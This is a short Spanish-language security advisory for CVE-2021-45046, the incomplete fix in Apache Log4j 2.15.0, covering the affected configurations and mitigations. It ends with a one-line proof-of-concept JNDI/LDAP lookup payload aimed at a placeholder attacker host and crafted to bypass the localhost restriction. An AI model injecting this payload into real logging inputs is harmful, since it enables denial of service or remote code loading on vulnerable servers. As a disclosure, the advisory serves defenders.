
Log4j 2.15.0 Escalación de Privilegios -- CVE-2021-45046

Se descubrió que la corrección para abordar CVE-2021-44228 en Apache Log4j 2.15.0 era incompleta en ciertas configuraciones no predeterminadas. Esto podría permitir a atacantes con control sobre los datos de entrada del Thread Context Map (MDC) cuando la configuración de registro utiliza un Layout de Patrón no predeterminado con una Context Lookup (por ejemplo, $${ctx:loginId}) o un patrón de Thread Context Map (%X, %mdc o %MDC) para elaborar datos de entrada maliciosos utilizando un patrón de JNDI Lookup, resultando en un ataque de denegación de servicio (DOS). Log4j 2.15.0 restringe las búsquedas JNDI LDAP a localhost de forma predeterminada. Tenga en cuenta que las mitigaciones anteriores que involucran configuraciones como establecer la propiedad del sistema log4j2.noFormatMsgLookup en true NO mitigan esta vulnerabilidad específica. Log4j 2.16.0 soluciona este problema eliminando la compatibilidad con patrones de búsqueda de mensajes y deshabilitando la funcionalidad JNDI de forma predeterminada. Este problema se puede mitigar en versiones anteriores (<2.16.0) eliminando la clase JndiLookup del classpath (ejemplo: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).
Poc
${jndi:ldap://127.0.0.1#evil[.]com:1389/a}